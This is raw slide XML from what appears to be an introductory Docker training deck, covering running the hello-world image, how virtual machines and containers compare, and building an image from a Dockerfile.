              <a:cs typeface="CiscoSansTT Thin" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{58DD95FC-F9C1-40BA-9D72-80BE2786933F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="528298" y="1432447"/>
            <a:ext cx="8345487" cy="1095825"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B8270A62-2FD0-44DB-8D99-EF584F869ECE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="528299" y="3051009"/>
            <a:ext cx="5807508" cy="1501942"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="14724227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8737" y="1205898"/>
            <a:ext cx="4619132" cy="3083094"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="57149" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="282828"/>
                </a:solidFill>
                <a:latin typeface="CiscoSansTT ExtraLight"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t># docker run hello-world</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="57149" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Title 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Running public images</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="57" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="304800" y="1657350"/>
            <a:ext cx="4498769" cy="3083094"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="342892" indent="-342892"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="282828"/>
                </a:solidFill>
                <a:latin typeface="CiscoSansTT ExtraLight"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>No </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="282828"/>
                </a:solidFill>
                <a:latin typeface="CiscoSansTT ExtraLight"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>docker</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="282828"/>
                </a:solidFill>
                <a:latin typeface="CiscoSansTT ExtraLight"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> image called hello-world exists locally, so </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="282828"/>
                </a:solidFill>
                <a:latin typeface="CiscoSansTT ExtraLight"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>docker</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="282828"/>
                </a:solidFill>
                <a:latin typeface="CiscoSansTT ExtraLight"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> CLI looks at the ‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="282828"/>
                </a:solidFill>
                <a:latin typeface="CiscoSansTT ExtraLight"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>docker</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="282828"/>
                </a:solidFill>
                <a:latin typeface="CiscoSansTT ExtraLight"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> hub’ first.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342892" indent="-342892"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="282828"/>
                </a:solidFill>
                <a:latin typeface="CiscoSansTT ExtraLight"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Downloads the image from docker hub, runs it as a container.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342892" indent="-342892"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="282828"/>
                </a:solidFill>
                <a:latin typeface="CiscoSansTT ExtraLight"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>What just happened?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2B0ED57E-4F3D-4F2D-A4FB-4240C0C5D96E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4803569" y="1111314"/>
            <a:ext cx="4325582" cy="3165981"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="11330274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51110" y="1647702"/>
            <a:ext cx="8662262" cy="1674421"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:br>
              <a:rPr lang="en-US" sz="4050" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="4050" dirty="0"/>
              <a:t>Understanding Hello-World</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Text Placeholder 3"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="469497" y="1897611"/>
            <a:ext cx="8296421" cy="28813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Tx/>
              <a:buNone/>
              <a:defRPr lang="en-US" sz="1600" b="0" i="0" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="CiscoSansTT ExtraLight"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="358775" indent="-215900" algn="l" defTabSz="684213" rtl="0" eaLnBrk="1" fontAlgn="base" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="95000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="tx2"/>
              </a:buClr>
              <a:buFontTx/>
              <a:buNone/>
              <a:defRPr lang="en-US" sz="1500" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="431800"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3pPr>
            <a:lvl4pPr marL="503238"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4pPr>
            <a:lvl5pPr marL="574675" indent="-169863" algn="l" defTabSz="684213" rtl="0" eaLnBrk="1" fontAlgn="base" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="95000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="625"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:buFontTx/>
              <a:buNone/>
              <a:defRPr lang="en-US" sz="1500" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-c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defTabSz="513160">
              <a:spcBef>
                <a:spcPts val="806"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="005073"/>
              </a:buClr>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="005073"/>
              </a:solidFill>
              <a:latin typeface="CiscoSansTT ExtraLight"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1114032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mj-lt"/>
              </a:rPr>
              <a:t>Virtual Machine vs. Container</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="21" name="Group 20"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="601137" y="1212865"/>
            <a:ext cx="3647014" cy="3346994"/>
            <a:chOff x="640080" y="1720009"/>
            <a:chExt cx="2959608" cy="2716137"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="6" name="Rectangle 5"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="640080" y="4070386"/>
              <a:ext cx="2959608" cy="36576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dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill>
                  <a:latin typeface="CiscoSansTT ExtraLight"/>
                </a:rPr>
                <a:t>Server</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="7" name="Rectangle 6"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="640080" y="3628333"/>
              <a:ext cx="2959608" cy="36576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dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="005073"/>
                  </a:solidFill>
                  <a:latin typeface="CiscoSansTT ExtraLight"/>
                </a:rPr>
                <a:t>Hypervisor / Host OS</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="8" name="Rectangle 7"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="640080" y="2783945"/>
              <a:ext cx="1444752" cy="76809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dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill>
                  <a:latin typeface="CiscoSansTT ExtraLight"/>
                </a:rPr>
                <a:t>Guest OS</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9" name="Rectangle 8"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="640080" y="2251977"/>
              <a:ext cx="1444752" cy="4556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solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill>
                  <a:latin typeface="CiscoSansTT ExtraLight"/>
                </a:rPr>
                <a:t>Bins/Libs</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="CiscoSansTT ExtraLight"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="10" name="Rectangle 9"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="640080" y="1720009"/>
              <a:ext cx="1444752" cy="4556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dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill>
                  <a:latin typeface="CiscoSansTT ExtraLight"/>
                </a:rPr>
                <a:t>App 1</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="11" name="Rectangle 10"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2154936" y="2783945"/>
              <a:ext cx="1444752" cy="76809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dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill>
                  <a:latin typeface="CiscoSansTT ExtraLight"/>
                </a:rPr>
                <a:t>Guest OS</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="12" name="Rectangle 11"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2154936" y="2251885"/>
              <a:ext cx="1444752" cy="4556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dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill>
                  <a:latin typeface="CiscoSansTT ExtraLight"/>
                </a:rPr>
                <a:t>Bins/Libs</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="13" name="Rectangle 12"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2154936" y="1720009"/>
              <a:ext cx="1444752" cy="4556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dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill>
                  <a:latin typeface="CiscoSansTT ExtraLight"/>
                </a:rPr>
                <a:t>App 2</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="22" name="Group 21"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="4797743" y="1212864"/>
            <a:ext cx="3647014" cy="2912304"/>
            <a:chOff x="4446161" y="1720009"/>
            <a:chExt cx="2959608" cy="2363379"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="14" name="Rectangle 13"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4446161" y="3717628"/>
              <a:ext cx="2959608" cy="36576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dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill>
                  <a:latin typeface="CiscoSansTT ExtraLight"/>
                </a:rPr>
                <a:t>Server</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="15" name="Rectangle 14"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4446161" y="3265218"/>
              <a:ext cx="2959608" cy="36576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solidFill>
                    <a:srgbClr val="005073"/>
                  </a:solidFill>
                  <a:latin typeface="CiscoSansTT ExtraLight"/>
                </a:rPr>
                <a:t>Host OS</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="005073"/>
                </a:solidFill>
                <a:latin typeface="CiscoSansTT ExtraLight"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="16" name="Rectangle 15"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4446161" y="2812808"/>
              <a:ext cx="2959608" cy="36576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dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="005073"/>
                  </a:solidFill>
                  <a:latin typeface="CiscoSansTT ExtraLight"/>
                </a:rPr>
                <a:t>Container Engine</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="17" name="Rectangle 16"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4446161" y="2251885"/>
              <a:ext cx="1444752" cy="4556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solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill>
                  <a:latin typeface="CiscoSansTT ExtraLight"/>
                </a:rPr>
                <a:t>Bins/Libs</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="CiscoSansTT ExtraLight"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="18" name="Rectangle 17"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4446161" y="1720009"/>
              <a:ext cx="1444752" cy="4556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dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill>
                  <a:latin typeface="CiscoSansTT ExtraLight"/>
                </a:rPr>
                <a:t>App 1</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="19" name="Rectangle 18"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5961017" y="2251885"/>
              <a:ext cx="1444752" cy="4556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solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill>
                  <a:latin typeface="CiscoSansTT ExtraLight"/>
                </a:rPr>
                <a:t>Bins/Libs</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="CiscoSansTT ExtraLight"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="20" name="Rectangle 19"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5961017" y="1720009"/>
              <a:ext cx="1444752" cy="45567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dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill>
                  <a:latin typeface="CiscoSansTT ExtraLight"/>
                </a:rPr>
                <a:t>App 2</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="886775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37766" y="341314"/>
            <a:ext cx="8345488" cy="840173"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Inspecting public images (what just happened?)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="57" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="437767" y="946151"/>
            <a:ext cx="8512175" cy="4097338"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buClr>
                <a:schemeClr val="accent1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>                Docker hub (website) &gt; hello-world &gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Dockerfile</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BCF47154-FAEF-4F83-8F5F-0AD5ADAFE6D7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="104429" y="1364813"/>
            <a:ext cx="4388138" cy="2832536"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4F5812EE-1C4D-4719-92D0-AC3C6EA2DB18}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4651435" y="1327716"/>
            <a:ext cx="4357749" cy="2869633"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4953984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Dockerfile</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="57" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="489158" y="956510"/>
            <a:ext cx="8345488" cy="1037725"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr defTabSz="914378" fontAlgn="auto">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>$ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>docker</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t> build .</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr defTabSz="914378" fontAlgn="auto">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>Uses </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>Dockerfile</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t> to create a docker image.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr defTabSz="914378" fontAlgn="auto">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2100" dirty="0"/>
              <a:t>Image has then been uploaded to docker hub as hello-world.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0">
              <a:latin typeface="+mj-lt"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Rectangle 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="367463" y="3441162"/>
            <a:ext cx="2448309" cy="923330"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
